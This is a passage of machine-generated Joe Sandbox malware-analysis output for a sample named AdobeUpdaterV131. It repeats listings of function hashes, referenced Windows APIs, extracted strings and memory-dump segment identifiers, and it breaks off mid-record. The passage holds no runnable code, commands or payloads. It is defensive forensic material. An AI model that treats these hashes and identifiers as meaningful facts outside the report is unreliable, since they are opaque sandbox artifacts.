                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 7631a2324c29ce7b9f6b2634291aa8b48fce0bab849f6dc18a87ad614e159a44
                                      • Instruction ID: 9cc85b85e0e1cef1be03aefa074a7ac16dfc637502aed28101156075bf1133eb
                                      • Opcode Fuzzy Hash: 7631a2324c29ce7b9f6b2634291aa8b48fce0bab849f6dc18a87ad614e159a44
                                      • Instruction Fuzzy Hash: CC010032614249EFCF098F59DC0589E3BA9DF81325F240208E8019B2D4EAB5ED828B90
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00621FDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID:
                                      • API String ID: 2659868963-0
                                      • Opcode ID: 96d8741c5bd1cb5ddfc9d0e52d750146dafe7f1ab02136646db99d30089cd677
                                      • Instruction ID: bbac18a713a3a742886b8e15ad3b3806dfc054ad4aa0ea084b2f934d9113bbbc
                                      • Opcode Fuzzy Hash: 96d8741c5bd1cb5ddfc9d0e52d750146dafe7f1ab02136646db99d30089cd677
                                      • Instruction Fuzzy Hash: 82014E7640470DB7C714AA95FC018A9B7DF9E023A0B508635FB14DA550FB70F5908BE5
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,006FD39B,?,?,?,?,?,00622D8D,006FA41C,?,?,006FA41C), ref: 00713B80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 1ace3f477864d29675b7eef49c1443cd7697812f6d2f081aafe2e9ff9adf42c1
                                      • Instruction ID: d4f51742850a8e280c86644c7e58afc646a92b6c4dcfb4c17ca394d3adff5dc5
                                      • Opcode Fuzzy Hash: 1ace3f477864d29675b7eef49c1443cd7697812f6d2f081aafe2e9ff9adf42c1
                                      • Instruction Fuzzy Hash: 1AE0EDB1108321A6E730362D4C06BDB3689CB823B1F054668BC18960C1EB9CCEC081F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $+$+Inf$-Inf$Inf$NaN$`s$gfff
                                      • API String ID: 0-2389460958
                                      • Opcode ID: 3621777f1104a9517aee0176c758efb0d85f00a5ddcca8a9a2395aa4b4d3fa4e
                                      • Instruction ID: 517233d721dd3b156385faf1ddc935ceccae28933d107f11b4f5b198ac7af5d3
                                      • Opcode Fuzzy Hash: 3621777f1104a9517aee0176c758efb0d85f00a5ddcca8a9a2395aa4b4d3fa4e
                                      • Instruction Fuzzy Hash: 4782AD71908B808FD725DF2884503ABBBE2AFDB344F08AA5EE4C997352D774CD458B42
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: %s|%s$131$<,u$<,u$d+u$type must be boolean, but is
                                      • API String ID: 0-1497195349
                                      • Opcode ID: fe311c6826695b2886f9f90946d89c76435d7e9cd7c75d22e91575464509d556
                                      • Instruction ID: 80b09e6e464e6ebcb06e2b1acb824d72d16b122f6ebc4f0811d804b68f307f96
                                      • Opcode Fuzzy Hash: fe311c6826695b2886f9f90946d89c76435d7e9cd7c75d22e91575464509d556
                                      • Instruction Fuzzy Hash: 1523EF709002588FDB25DFA8C958BEDBBB2AF06304F1481DCD449AB392DB759E85CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                      • API String ID: 0-1885142750
                                      • Opcode ID: 20d205e228e431458196f029913f89913a1a8a0eaa44fcc7912ecdaa33d4a0f0
                                      • Instruction ID: 0adf7193312db425ff6fb7d713c7e26661126d8dbd238c1a0036494ee176c698
                                      • Opcode Fuzzy Hash: 20d205e228e431458196f029913f89913a1a8a0eaa44fcc7912ecdaa33d4a0f0
                                      • Instruction Fuzzy Hash: 710217B0B007089FE7209F64DC45BBB77E6AF41704F14442CE64A87392EBB9E945CBA5
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Mtx_unlock
                                      • String ID: T@_
                                      • API String ID: 1418687624-2673433630
                                      • Opcode ID: e456f7fd71334e6cc5942ba4f7e0f66dc97c187fc543f57a69e13ffc3955e34a
                                      • Instruction ID: a796a7b1af3be89b31e43893b85489d099b2c1b729962d3c387e1681db20b670
                                      • Opcode Fuzzy Hash: e456f7fd71334e6cc5942ba4f7e0f66dc97c187fc543f57a69e13ffc3955e34a
                                      • Instruction Fuzzy Hash: 1032F271A002088FDB08DF68DC95BEEB7B2EF45314F14825CE805AB392DB75AA45CBD5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
                                      • API String ID: 0-1144537432
                                      • Opcode ID: 214c91792d497d63cfaffddfa24f537f66601e214ca4f6ca2762e1c71290ff01
                                      • Instruction ID: b43cfb84799f850472b58900e3e11043dc83656b7537d9ad9d7847eae8a36938
                                      • Opcode Fuzzy Hash: 214c91792d497d63cfaffddfa24f537f66601e214ca4f6ca2762e1c71290ff01
                                      • Instruction Fuzzy Hash: D291E671F002189FCB08DF6CD8917D9B7AAEB89320F14827EE919A7391D7755D06C790
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: File
                                      • API String ID: 0-749574446
                                      • Opcode ID: 02ccb49720001856df14318fecb0da6c1e8d821596d2bc19a3b2509ec42b3965
                                      • Instruction ID: 6e278e659a7893894bc6f79e43607b0b29d080fbc90e9411ac470c055681d98b
                                      • Opcode Fuzzy Hash: 02ccb49720001856df14318fecb0da6c1e8d821596d2bc19a3b2509ec42b3965
                                      • Instruction Fuzzy Hash: B6C1F070D00258ABDF10DFA4DC45BEEBBB9EF05300F144169E505BB292E7B4A985CF56
                                      APIs
                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,006FB999,?,?,?,?,0063454B,?,0063E6FC), ref: 006FBFA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FilePreciseSystem
                                      • String ID:
                                      • API String ID: 1802150274-0
                                      • Opcode ID: d2404373ef60e23983a718feaab409c8b75424e92e7691fff0c90b5f1d80fbf8
                                      • Instruction ID: ffcb37b76da85ec3f4a788cf4754baa2b3356c02260f366dade71f96ba88cb31
                                      • Opcode Fuzzy Hash: d2404373ef60e23983a718feaab409c8b75424e92e7691fff0c90b5f1d80fbf8
                                      • Instruction Fuzzy Hash: D6D0223290323CA38A253BD0FC004FDBB1DCB06B143045011EE0933220CB90AC014FE9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::invalid_argument::invalid_argument
                                      • String ID: string too long
                                      • API String ID: 2141394445-2556327735
                                      • Opcode ID: 5c883d4a69b42387c97cb1de710876cae76377125b000f1af8230418bd540c3f
                                      • Instruction ID: f36ca24fe731c9e304da94bba4da7395a2eb5b559ed28c112535914a7ae6efc3
                                      • Opcode Fuzzy Hash: 5c883d4a69b42387c97cb1de710876cae76377125b000f1af8230418bd540c3f
                                      • Instruction Fuzzy Hash: 25812375904696EFDB01CFA8C465BEEBFB2EF1A300F144199D9806B782C3758646CBE0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2787a25465fd2c320d796ce91c86076c4aab692f03f0fee95ccf97b2dfda5a7a
                                      • Instruction ID: 13b76f0d96a1506a8fb056dd5cb033483c52ab83950c8d9f98717579ca316f84
                                      • Opcode Fuzzy Hash: 2787a25465fd2c320d796ce91c86076c4aab692f03f0fee95ccf97b2dfda5a7a
                                      • Instruction Fuzzy Hash: F8920331D006588BDF09CFA8D8947FEBB76EF42314F24829CD8556B282D7749A86CF91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7775860cce46587a2d2b5316939500113ab393172fd34712505d2e9bfb515b53
                                      • Instruction ID: 457c8b1241154d9433e6086577e796fe47d87a15cedacd76bf373435b9e583fb
